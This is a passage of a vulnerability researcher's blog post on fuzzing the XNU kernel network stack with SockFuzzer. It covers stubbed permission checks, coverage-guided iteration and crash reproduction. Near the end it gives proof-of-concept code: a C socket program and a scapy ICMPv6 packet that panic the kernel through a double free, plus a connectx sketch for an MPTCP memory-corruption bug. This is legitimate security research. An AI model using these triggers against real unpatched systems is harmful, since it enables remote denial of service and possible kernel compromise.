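void read_random(void *buffer, unsigned int nbytes) {
  get_fuzzed_bytes(buffer, nbytes);
}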

Authentication

XNU features some mechanisms (KAuth, MAC checks, user checks) to determine whether a given syscall is permissible. Because of the importance and relative rarity of bugs in XNU, and my willingness to triage false positives, I decided to allow all actions by default. For example, the TCP multipath code requires a special entitlement, but disabling this functionality precludes us from finding Ian’s multipath vulnerability. Rather than fuzz only code accessible inside the app sandbox, I figured I would just triage whatever comes up and report it with the appropriate severity in mind.

For example, when we create a socket, the kernel checks whether the running process is allowed to make a socket of the given domain, type, and protocol, given its KAuth credentials:

static int

socket_common(struct proc *p,

    int domain,

    int type,

    int protocol,

    pid_t epid,

    int32_t *retval,

    int delegate)

{

        struct socket *so;

        struct fileproc *fp;

        int fd, error;

        AUDIT_ARG(socket, domain, type, protocol);

#if CONFIG_MACF_SOCKET_SUBSET

        if ((error = mac_socket_check_create(kauth_cred_get(), domain,

            type, protocol)) != 0) {

                return error;

        }

#endif /* MAC_SOCKET_SUBSET */

When we reach this function in our fuzzer, we trigger an assert crash because this functionality was stubbed.

    #6 0x7f58f49b53f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7f58f49ba070 in kauth_cred_get /source/build3/../fuzz/fake_impls.c:272:3

    #8 0x7f58f3c70889 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:39

    #9 0x7f58f3c7043a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9

    #10 0x7f58f49b45e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10

    #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19

Now, we need to implement kauth_cred_get. In this case, we return a (void*)1 pointer so that NULL checks on the value will pass (and if it turns out we need to model this correctly, we’ll crash again when the pointer is used).

void* kauth_cred_get() {

  return (void*)1;

}

Now we crash while actually checking the permissions, this time in mac_socket_check_create.

    #6 0x7fbe9219a3f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7fbe9219f100 in mac_socket_check_create /source/build3/../fuzz/fake_impls.c:312:33

    #8 0x7fbe914558a3 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:15

    #9 0x7fbe9145543a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9

    #10 0x7fbe921995e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10

    #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19

    #12 0x4e76c2 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1

Now we simply return 0 and move on.

int mac_socket_check_create() { return 0; }

As you can see, we don’t always need to do a lot of work to fake functionality. We can opt for a much simpler model that still gets us the results we want.

Coverage Guided Development

We’ve paid a sizable initial cost to implement this fuzz target, but we’re now entering the longest and most fun stage of the project: iterating and maintaining the fuzzer. We begin by running the fuzzer continuously (in my case, I ensured it could run on ClusterFuzz). A day of work then consists of fetching the latest corpus, running a clang-coverage visualization pass over it, and viewing the report. While initially most of the work involved fixing assertion failures to get the fuzzer working, we now look for silent implementation deficiencies only visible in the coverage reports. A snippet from the report looks like the following:

Several lines of code have a column indicating that they have been covered tens of thousands of times. Below them, you can see a switch statement for handling the parsing of IP options. Only the default case is covered approximately fifty thousand times, while the routing record options are covered 0 times.

This excerpt from IP option handling shows that we don’t support the various packets well with the current version of the fuzzer and grammar. Having this visualization is enormously helpful and necessary to succeed, as it is a source of truth about your fuzz target. By directing development work around these reports, it’s relatively easy to plan actionable and high-value tasks around the fuzzer.

I like to think about improving a fuzz target by either improving “soundness” or “completeness.” Logicians probably wouldn’t be happy with how I’m loosely using these terms, but they are a good metaphor for the task. To start with, we can improve the completeness of a given fuzz target by helping it reach code that we know to be reachable based on manual review. In the above example, I would suspect very strongly that the uncovered option handling code is reachable. But despite a long fuzzing campaign, these lines are uncovered, and therefore our fuzz target is incomplete, somehow unable to generate inputs reaching these lines. There are two ways to get this needed coverage: in a top-down or bottom-up fashion. Each has its tradeoffs. The top-down way to cover this code is to improve the existing grammar or C++ code to make it possible or more likely. The bottom-up way is to modify the code in question. For example, we could replace switch (opt) with something like switch (global_fuzzed_data->ConsumeRandomEnum(valid_enums)). This bottom-up approach introduces unsoundness, as maybe these enums could never have been selected at this point. But this approach has often led to interesting-looking crashes that encouraged me to revert the change and proceed with the more expensive top-down implementation. When it’s one researcher working against potentially hundreds of thousands of lines, you need tricks to prioritize your work. By placing many cheap bets, you can revert later for free and focus on the most fruitful areas.

Improving soundness is the other side of the coin here. I’ve just mentioned reverting unsound changes and moving those changes out of the target code and into the grammar. But our fake objects are also simple models for how their real implementations behave. If those models are too simple or directly inaccurate, we may either miss bugs or introduce them. I’m comfortable missing some bugs as I think these simple fakes enable better coverage, and it’s a net win. But sometimes, I’ll observe a crash or failure to cover some code because of a faulty model. So improvements can often come in the form of making these fakes better.

All in all, there is plenty of work that can be done at any given point. Fuzzing isn’t an all or nothing one-shot endeavor for large targets like this. This is a continuous process, and as time goes on, easy gains become harder to achieve as most bugs detectable with this approach are found, and eventually, there comes a natural stopping point. But despite working on this project for several months, it’s remarkably far from the finish line, even though it has already produced several useful bug reports. The cool thing about fuzzing in this way is that it is a bit like excavating a fossil. Each target is different; we make small changes to the fuzzer, tapping away at the target with a chisel each day and letting our coverage metrics, not our biases, reveal the path forward.

Packet Delivery

I’d like to cover one example to demonstrate the value of the “bottom-up” unsound modification, as in some cases, the unsound modification is dramatically cheaper than the grammar-based one. Disabling checksum checks is a well-known fuzzer-only modification when fuzzer authors know that valid checksums could be trivially generated by hand. But the same idea can also be applied in other places, such as packet delivery.

When an mbuf containing a TCP packet arrives, it is handled by tcp_input. In order for almost anything meaningful to occur with this packet, it must be matched by IP address and port to an existing protocol control block (PCB) for that connection, as seen below.

void

tcp_input(struct mbuf *m, int off0)

{

// ...

        if (isipv6) {

            inp = in6_pcblookup_hash(&tcbinfo, &ip6->ip6_src, th->th_sport,

                &ip6->ip6_dst, th->th_dport, 1,

                m->m_pkthdr.rcvif);

        } else

#endif /* INET6 */

        inp = in_pcblookup_hash(&tcbinfo, ip->ip_src, th->th_sport,

            ip->ip_dst, th->th_dport, 1, m->m_pkthdr.rcvif);

Here’s the IPv4 lookup code. Note that faddr, fport_arg, laddr, and lport_arg are all taken directly from the packet and are checked against the list of PCBs, one at a time. This means that we must guess two 4-byte integers and two 2-byte shorts to match the packet to the relevant PCB. Even coverage-guided fuzzing is going to have a hard time guessing its way through these comparisons. While eventually a match will be found, we can radically improve the odds of covering meaningful code by just flipping a coin instead of doing the comparisons. This change is extremely easy to make, as we can fetch a random boolean from the fuzzer at runtime. Looking up existing PCBs and fixing up the IP/TCP headers before sending the packets is a sounder solution, but in my testing this change didn’t introduce any regressions. Now when a vulnerability is discovered, it’s just a matter of fixing up headers to match packets to the appropriate PCB. That’s light work for a vulnerability researcher looking for a remote memory corruption bug.

/*
 * Lookup PCB in hash list.
 */
struct inpcb *
in_pcblookup_hash(struct inpcbinfo *pcbinfo, struct in_addr faddr,
    u_int fport_arg, struct in_addr laddr, u_int lport_arg, int wildcard,
    struct ifnet *ifp)
{
// ...
    head = &pcbinfo->ipi_hashbase[INP_PCBHASH(faddr.s_addr, lport, fport,
        pcbinfo->ipi_hashmask)];
    LIST_FOREACH(inp, head, inp_hash) {
-               if (inp->inp_faddr.s_addr == faddr.s_addr &&
-                   inp->inp_laddr.s_addr == laddr.s_addr &&
-                   inp->inp_fport == fport &&
-                   inp->inp_lport == lport) {
+               if (!get_fuzzed_bool()) {
                        if (in_pcb_checkstate(inp, WNT_ACQUIRE, 0) !=
                            WNT_STOPUSING) {
                                lck_rw_done(pcbinfo->ipi_lock);
                                return inp;


Astute readers may have noticed that the PCBs are fetched from a hash table, so it’s not enough just to replace the check. The four values compared in the linear search are also used to calculate the PCB hash, so we have to make sure all PCBs share a single bucket, as seen in the diff below. The real kernel shouldn’t do this, since lookups become O(n), but we only create a few sockets, so it’s acceptable.

diff --git a/bsd/netinet/in_pcb.h b/bsd/netinet/in_pcb.h
index a5ec42ab..37f6ee50 100644
--- a/bsd/netinet/in_pcb.h
+++ b/bsd/netinet/in_pcb.h
@@ -611,10 +611,9 @@ struct inpcbinfo {
        u_int32_t               ipi_flags;
 };
-#define INP_PCBHASH(faddr, lport, fport, mask) \
-       (((faddr) ^ ((faddr) >> 16) ^ ntohs((lport) ^ (fport))) & (mask))
-#define INP_PCBPORTHASH(lport, mask) \
-       (ntohs((lport)) & (mask))
+// nedwill: let all pcbs share the same hash
+#define        INP_PCBHASH(faddr, lport, fport, mask) (0)
+#define        INP_PCBPORTHASH(lport, mask) (0)
 #define INP_IS_FLOW_CONTROLLED(_inp_) \
        ((_inp_)->inp_flags & INP_FLOW_CONTROLLED)
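
For completeness, here is a minimal sketch of how a helper like get_fuzzed_bool() could be backed by the fuzzer’s input. The byte-pool plumbing and the set_fuzz_data() name are assumptions made for illustration, not the actual implementation in the fuzz/ directory, which routes this through its own data provider.

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

// Hypothetical backing store: a slice of the fuzzer's input that the harness
// hands to the "kernel" at the start of each test case.
static const uint8_t *fuzz_bytes;
static size_t fuzz_len;
static size_t fuzz_pos;

// Called by the harness before replaying a test case.
void set_fuzz_data(const uint8_t *data, size_t len) {
  fuzz_bytes = data;
  fuzz_len = len;
  fuzz_pos = 0;
}

// Called from patched kernel code such as in_pcblookup_hash() above.
bool get_fuzzed_bool(void) {
  // Once the pool is exhausted, return a fixed answer so that replaying the
  // same input remains deterministic.
  if (fuzz_pos >= fuzz_len)
    return false;
  return (fuzz_bytes[fuzz_pos++] & 1) != 0;
}

Because every decision is consumed from the test case itself, the coin flips are reproducible: replaying a crashing input makes the same PCB-matching choices it made when the crash was first found.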

Checking Our Work: Reproducing the Sample Bugs

With most of the necessary supporting code implemented, we can fuzz for a while without hitting any assertions due to unimplemented stubbed functions. At this stage, I reverted the fixes for the two inspiration bugs I mentioned at the beginning of this article. Here’s what we see shortly after we run the fuzzer with those fixes reverted:

==1633983==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00029f474 at pc 0x00000049fcb7 bp 0x7ffcddc88590 sp 0x7ffcddc87d58
WRITE of size 20 at 0x61d00029f474 thread T0
    #0 0x49fcb6 in __asan_memmove /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:30:3
    #1 0x7ff64bd83bd9 in __asan_bcopy fuzz/san.c:37:3
    #2 0x7ff64ba9e62f in icmp_error bsd/netinet/ip_icmp.c:362:2
    #3 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2
    #4 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34
    #5 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3
    #6 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7
    #7 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9

0x61d00029f474 is located 12 bytes to the left of 2048-byte region [0x61d00029f480,0x61d00029fc80)
allocated by thread T0 here:
    #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3
    #1 0x7ff64bd82b20 in mbuf_create fuzz/zalloc.c:157:45
    #2 0x7ff64bd8319e in mcache_alloc fuzz/zalloc.c:187:12
    #3 0x7ff64b69ae84 in m_getcl bsd/kern/uipc_mbuf.c:3962:6
    #4 0x7ff64ba9e15c in icmp_error bsd/netinet/ip_icmp.c:296:7
    #5 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2
    #6 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34
    #7 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3
    #8 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7
    #9 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9

When we inspect the test case, we see that a single raw IPv4 packet was generated to trigger this bug. This is to be expected, as the bug doesn’t require an existing connection, and looking at the stack, we can see that the test case triggered the bug in the IPv4-specific ip_input path.

commands {

  ip_input {

    raw_ip4: "M\001\000I\001\000\000\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII"

  }

}

data_provider: ""


If we fix that issue and fuzz a bit longer, we soon see another crash, this time in the MPTCP stack. This is Ian’s MPTCP vulnerability. The ASAN report looks strange, though: why is it crashing during garbage collection, in mptcp_session_destroy? The original vulnerability was an out-of-bounds write, but ASAN couldn’t catch it because the write stayed within the bounds of a single struct allocation. This is a well-known limitation of ASAN and of similar mitigations such as the upcoming MTE, which likewise can’t see corruption that never leaves its own allocation. As a result, we don’t catch the bug until later, when a randomly corrupted pointer is accessed.
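
As a contrived illustration of that limitation (this is not the MPTCP code, just a toy example), consider an overflow that never leaves its own heap allocation, so ASAN’s redzones never see it:

#include <stdlib.h>
#include <string.h>

// Toy example: the overflow stays inside one 16-byte heap allocation.
struct session {
  char tag[8];
  char *buf;  // silently trampled by the memset below
};

int main(void) {
  struct session *s = malloc(sizeof(*s));
  s->buf = malloc(16);
  // Writes 16 bytes into an 8-byte field: still in bounds of the allocation,
  // so ASAN stays quiet, but s->buf is now 0x4141414141414141.
  memset(s->tag, 'A', sizeof(*s));
  // The corruption only becomes visible here, when the clobbered pointer is
  // used, far away from the actual overflow.
  free(s->buf);
  free(s);
  return 0;
}

With that in mind, here’s the report for the MPTCP crash: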

==1640571==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x6190000079dc in thread T0
    #0 0x4a0094 in free /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3
    #1 0x7fbdfc7a16b0 in _FREE fuzz/zalloc.c:293:36
    #2 0x7fbdfc52b624 in mptcp_session_destroy bsd/netinet/mptcp_subr.c:742:3
    #3 0x7fbdfc50c419 in mptcp_gc bsd/netinet/mptcp_subr.c:4615:3
    #4 0x7fbdfc4ee052 in mp_timeout bsd/netinet/mp_pcb.c:118:16
    #5 0x7fbdfc79b232 in clear_all fuzz/backend.c:83:3
    #6 0x4dfd5c in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:1010:3

0x6190000079dc is located 348 bytes inside of 920-byte region [0x619000007880,0x619000007c18)
allocated by thread T0 here:
    #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3
    #1 0x7fbdfc7a03d4 in zalloc fuzz/zalloc.c:37:10
    #2 0x7fbdfc4ee710 in mp_pcballoc bsd/netinet/mp_pcb.c:222:8
    #3 0x7fbdfc53cf8a in mptcp_attach bsd/netinet/mptcp_usrreq.c:211:15
    #4 0x7fbdfc53699e in mptcp_usr_attach bsd/netinet/mptcp_usrreq.c:128:10
    #5 0x7fbdfc0e1647 in socreate_internal bsd/kern/uipc_socket.c:784:10
    #6 0x7fbdfc0e23a4 in socreate bsd/kern/uipc_socket.c:871:9
    #7 0x7fbdfc118695 in socket_common bsd/kern/uipc_syscalls.c:266:11
    #8 0x7fbdfc1182d1 in socket bsd/kern/uipc_syscalls.c:214:9
    #9 0x7fbdfc79a26e in socket_wrapper fuzz/syscall_wrappers.c:371:10
    #10 0x4dd275 in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:655:19

Here’s the protobuf input for the crashing testcase:

commands {

  socket {

    domain: AF_MULTIPATH

    so_type: SOCK_STREAM

    protocol: IPPROTO_IP

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_srcaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304"

        }

      }

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_IDEMPOTENT

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_srcaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304"

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_AUTHENTICATED

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

  }

}

commands {

  close {

    fd: FD_8

  }

}

commands {

  ioctl_real {

    siocsifflags {

      ifr_name: LO0

      flags: IFF_LINK1

    }

  }

}

commands {

  close {

    fd: FD_8

  }

}

data_provider: "\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025"

Hmm, that’s quite large and hard to follow. Is the bug really that complicated? We can use libFuzzer’s crash minimization feature to find out. Protobuf-based test cases simplify nicely because even large test cases are already structured, so we can randomly edit and remove nodes from the message. After about a minute of automated minimization, we end up with the test shown below.

commands {

  socket {

    domain: AF_MULTIPATH

    so_type: SOCK_STREAM

    protocol: IPPROTO_IP

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_1

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: "bugmbuf_debutoeloListen_dedeloListen_dedebuloListete_debugmbuf_debutoeloListen_dedeloListen_dedebuloListeListen_dedebuloListe_dtrte" # string length 131

        }

      }

    }

    associd: ASSOCID_CASE_0

  }

}

data_provider: ""


This is a lot easier to read! It appears that SockFuzzer managed to open a socket in the AF_MULTIPATH domain and called connectx on it with a sockaddr using an unexpected sa_family, in this case AF_MULTIPATH again. The large sa_data field was then used to overwrite memory. You can also see artifacts of the heuristics the fuzzer uses to guess strings, as "listen" and "mbuf" appear in the input. This testcase could be further simplified by replacing the sa_data with a repeated character, but I left it as-is so you can see exactly what it’s like to work with the output of this fuzzer.
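
To make that translation concrete, here is roughly what those two protobuf messages correspond to as plain userspace calls. This is an illustrative, untested sketch rather than the PoC from the report: AF_MULTIPATH isn’t exposed by the public SDK headers, so the value defined below is an assumption taken from XNU, and the oversized destination buffer is arbitrary.

#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#ifndef AF_MULTIPATH
#define AF_MULTIPATH 39  /* assumed value; not defined in the public SDK headers */
#endif

int main(void) {
  // commands { socket { domain: AF_MULTIPATH so_type: SOCK_STREAM ... } }
  int fd = socket(AF_MULTIPATH, SOCK_STREAM, 0);
  if (fd < 0)
    return 1;

  // commands { connectx { ... sae_dstaddr with sa_family AF_MULTIPATH and a
  // large sa_data ... } }: an oversized "destination address" whose family
  // is, unexpectedly, AF_MULTIPATH again.
  char dst[160];
  memset(dst, 'A', sizeof(dst));
  struct sockaddr *sa = (struct sockaddr *)dst;
  sa->sa_len = sizeof(dst);
  sa->sa_family = AF_MULTIPATH;

  sa_endpoints_t eps;
  memset(&eps, 0, sizeof(eps));
  eps.sae_dstaddr = sa;
  eps.sae_dstaddrlen = sizeof(dst);

  connectx(fd, &eps, SAE_ASSOCID_ANY, 0, NULL, 0, NULL, NULL);

  close(fd);
  return 0;
}

On a patched kernel a call like this should simply return an error; the point is how directly the protobuf grammar maps onto the underlying syscall interface.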

In my experience, the protobuf-formatted syscalls and packet descriptions were highly useful for reproducing crashes and tended to work on the first attempt. I didn’t have an excellent setup for debugging on-device, so I tried to lean on the fuzzing framework as much as I could to understand issues before proceeding with the expensive process of reproducing them.

In my previous post describing the “SockPuppet” vulnerability, I walked through one of the newly discovered vulnerabilities, from protobuf to exploit. I’d like to share another original protobuf bug report for a remotely-triggered vulnerability I reported here.

commands {

  socket {

    domain: AF_INET6

    so_type: SOCK_RAW

    protocol: IPPROTO_IP

  }

}

commands {

  set_sock_opt {

    level: SOL_SOCKET

    name: SO_RCVBUF

    val: "\021\000\000\000"

  }

}

commands {

  set_sock_opt {

    level: IPPROTO_IPV6

    name: IP_FW_ZERO

    val: "\377\377\377\377"

  }

}

commands {

  ip_input {

    tcp6_packet {

      ip6_hdr {

        ip6_hdrctl {

          ip6_un1_flow: 0

          ip6_un1_plen: 0

          ip6_un1_nxt: IPPROTO_ICMPV6

          ip6_un1_hlim: 0

        }

        ip6_src: IN6_ADDR_LOOPBACK

        ip6_dst: IN6_ADDR_ANY

      }

      tcp_hdr {

        th_sport: PORT_2

        th_dport: PORT_1

        th_seq: SEQ_1

        th_ack: SEQ_1

        th_off: 0

        th_win: 0

        th_sum: 0

        th_urp: 0

        is_pure_syn: false

        is_pure_ack: false

      }

      data: "\377\377\377\377\377\377\377\377\377\377\377\377q\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"

    }

  }

}

data_provider: ""

This automatically minimized test case requires some human translation to a report that’s actionable by developers who don’t have access to our fuzzing framework. The test creates a socket and sets some options before delivering a crafted ICMPv6 packet. You can see how the packet grammar we specified comes in handy. I started by transcribing the first three syscall messages directly by writing the following C program.

#include <sys/socket.h>
#define __APPLE_USE_RFC_3542
#include <netinet/in.h>
#include <stdio.h>
#include <unistd.h>

int main() {
    int fd = socket(AF_INET6, SOCK_RAW, IPPROTO_IP);
    if (fd < 0) {
        printf("failed\n");
        return 0;
    }
    int res;
    // This is not needed to cause a crash on macOS 10.14.6, but you can
    // try setting this option if you can't reproduce the issue.
    // int space = 1;
    // res = setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &space, sizeof(space));
    // printf("res1: %d\n", res);
    int enable = 1;
    res = setsockopt(fd, IPPROTO_IPV6, IPV6_RECVPATHMTU, &enable, sizeof(enable));
    printf("res2: %d\n", res);
    // Keep the socket open without terminating.
    while (1) {
        sleep(5);
    }
    close(fd);
    return 0;
}

With the socket open, it’s now a matter of sending a special ICMPv6 packet to trigger the bug. Using the original crash as a guide, I reviewed the code around the crashing instruction to understand which parts of the input were relevant. I discovered that sending a “packet too big” notification would reach the buggy code, so I used the scapy library for Python to send the buggy packet locally. My kernel panicked, confirming the double free vulnerability.

from scapy.all import sr1, IPv6, ICMPv6PacketTooBig, raw

outer = IPv6(dst="::1") / ICMPv6PacketTooBig() / ("\x41"*40)
print(raw(outer).hex())
p = sr1(outer)
if p:
    p.show()

Creating a working PoC from the crashing protobuf input took about an hour, thanks to the straightforward mapping from grammar to syscalls/network input and the utility of being able to debug the local crashing “kernel” using gdb.

Drawbacks

Any fuzzing project of this size will require design decisions that have some tradeoffs. The most obvious issue is the inability to detect race conditions. Threading bugs can be found with fuzzing but are still best left to static analysis and manual review as fuzzers can’t currently deal with the state space of interleaving threads. Maybe this will change in the future, but today it’s an issue. I accepted this problem and removed threading completely from the fuzzer; some bugs were missed by this, such as a race condition in the bind syscall.

Another issue is that, because so much functionality is replaced by hand, the fuzzer isn’t trivial to extend to additional attack surfaces. This is evidenced by another bug I missed in packet filtering: I don’t support VFS at the moment, so I can’t access the bpf device. A syzkaller-like project would have less trouble supporting this code, since VFS would already be working. I made an explicit decision to build a simple tool that works very effectively within its focus, but this can mean missing some low-hanging fruit due to the effort involved in supporting each new area.

Per-test case determinism is an issue that I’ve solved only partially. If test cases aren’t deterministic, libFuzzer becomes less efficient as it thinks some tests are finding new coverage when they really depend on one that was run previously. To mitigate this problem, I track open file descriptors manually and run all of the garbage collection thread functions after each test case. Unfortunately, there are many ioctls that change state in the background. It’s hard to keep track of them to clean up properly but they are important enough that it’s not worth disabling them just to improve determinism. If I were working on a long-term well-resourced overhaul of the XNU network stack, I would probably make sure there’s a way to cleanly tear down the whole stack to prevent this problem.
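
To sketch what that cleanup looks like (the names and structure here are illustrative; the real fuzz/backend.c tracks more state than this), the per-testcase teardown amounts to closing anything the input left open and then running the deferred "kernel thread" work by hand:

#include <stddef.h>

#define MAX_TRACKED_FDS 32

// Hypothetical bookkeeping for per-testcase determinism.
static int tracked_fds[MAX_TRACKED_FDS];
static size_t num_tracked_fds;

// Called by the socket()/accept() wrappers whenever they hand out a descriptor.
void track_fd(int fd) {
  if (fd >= 0 && num_tracked_fds < MAX_TRACKED_FDS)
    tracked_fds[num_tracked_fds++] = fd;
}

// Called after every test case: close lingering sockets, then run the work
// that kernel threads and timers would normally do in the background (for
// example, the MPTCP garbage collection seen in the stack trace above), so
// that state from one input can't leak into the next.
void clear_all_sketch(void (*close_fn)(int), void (*run_deferred_work)(void)) {
  for (size_t i = 0; i < num_tracked_fds; i++)
    close_fn(tracked_fds[i]);
  num_tracked_fds = 0;
  run_deferred_work();
}

The callbacks keep the sketch independent of the fuzzer’s internals; in practice the close path would go through the same syscall wrappers the test cases themselves use.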

Perhaps the largest caveat of this project is its reliance on source code. Without the efficiency and productivity losses that come with binary-only research, I can study the problem much closer to its source. But I humbly admit that this approach ignores many targets and doesn’t necessarily match real attackers’ workflows. Real attackers take the shortest path they can to find an exploitable vulnerability, and often that path runs through bugs found via binary-based fuzzing or reverse engineering and auditing. I intend to discover some of the best practices for fuzzing with source and then migrate this approach to work with binaries. Binary instrumentation can assist in coverage-guided fuzzing, but some of my tricks, such as substituting fake implementations or changing behavior to be more fuzz-friendly, are a more significant burden when working with binaries. But I believe these are tractable problems, and I expect researchers can adapt some of these techniques to binary-only fuzzing efforts, even if there is additional overhead.

Open Sourcing and Future Work

This fuzzer is now open source on GitHub. I invite you to study the code and improve it! I’d like to continue the development of this fuzzer semi-publicly. Some modifications that yield new vulnerabilities may need to be embargoed until relevant patches go out. Still, I hope that I can be as transparent as possible in my research. By working publicly, it may be possible to bring the original XNU project and this fuzzer closer together by sharing the efforts. I’m hoping the upstream developers can make use of this project to perform their own testing and perhaps make their own improvements to XNU to make this type of testing more accessible. There’s plenty of remaining work to improve the existing grammar, add support for new subsystems, and deal with some high-level design improvements such as adding proper threading support.

An interesting property of the current fuzzer is that despite reaching coverage saturation on ClusterFuzz after many months, there is still reachable but uncovered code due to the enormous search space. This means that improvements in coverage-guided fuzzing could find new bugs. I’d like to encourage teams who perform fuzzing engine research to use this project as a baseline. If you find a bug, you can take the credit for it! I simply hope you share your improvements with me and the rest of the community.

Conclusion

Modern kernel development has some catching up to do. XNU and Linux suffer from some process failures that lead to shipping security regressions. Kernels, perhaps the most security-critical component of operating systems, are becoming increasingly fragile as memory corruption issues become easier to discover. Implementing better mitigations is half the battle; we need better kernel unit testing to make identifying and fixing (even non-security) bugs cheaper.

Since my last post, Apple has increased the frequency of its open-source releases. This is great for end-user security. The more publicly that Apple can develop XNU, the more that external contributors like myself may have a chance to contribute fixes and improvements directly. Maintaining internal branches for upcoming product launches while keeping most development open has helped Chromium and Android security, and I believe XNU’s development could follow this model. As software engineering grows as a field, our experience has shown us that open, shared, and continuous development has a real impact on software quality and stability by improving developer productivity. If you don’t invest in CI, unit testing, security reviews, and fuzzing, attackers may do that for you - and users pay the cost whether they recognize it or not.
